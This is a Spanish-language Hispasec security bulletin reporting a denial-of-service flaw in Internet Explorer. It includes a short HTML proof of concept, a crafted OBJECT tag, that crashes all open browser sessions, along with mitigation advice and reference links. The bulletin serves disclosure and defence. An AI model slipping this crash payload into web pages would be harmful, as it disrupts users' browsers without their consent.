Fuente: hispasec.com

La última versión del navegador de Microsoft se bloquea al visualizar
una página web con una etiqueta OBJECT especialmente construida.
Cuando un usuario visualiza la página que provoca el DoS se produce
un error y fuerza al cierre de todas las sesiones de Internet
Explorer abiertas.

Como prueba de concepto, el siguiente código HTML reproduce el
problema. Basta con guardarlo con extensión .htm y abrir el
archivo para comprobar el efecto que produce en Internet Explorer.

>>>

<object id="test"
data="#"
width="100%" height="100%"
type="text/x-scriptlet"
VIEWASTEXT></object>

<<<

De momento no existe solución al problema, si bien se espera que en
breve Microsoft ofrezca algún parche al respecto. Mientras tanto,
otras medidas de prevención podrían pasar por detectarlo a nivel de
filtros de contenidos, e incluso antivirus, que cada vez más
incorporan detección de exploits tanto a nivel servidor como
cliente.

Opina sobre esta noticia:
http://www.hispasec.com/unaaldia/1638/comentar

Más información:

Microsoft Internet Explorer Malformed Object Tag Denial of Service
Vulnerability
http://www.securityfocus.com/bid/7373/info/


Bernardo Quintero
bernardo@hispasec.com


Tal día como hoy:
-----------------

20/04/2002: Vulnerabilidad en los privilegios de usuario en Oracle9i
http://www.hispasec.com/unaaldia/1273

20/04/2001: Grave vulnerabilidad en PGP para Windows
http://www.hispasec.com/unaaldia/908

20/04/2000: FrontPage: eliminar DVWSSR.DLL, IMAGEMAP.EXE y HTIMAGE.EXE
http://www.hispasec.com/unaaldia/541

20/04/1999: El Departamento de Defensa Americano transfiere la gestión del cifrado
http://www.hispasec.com/unaaldia/175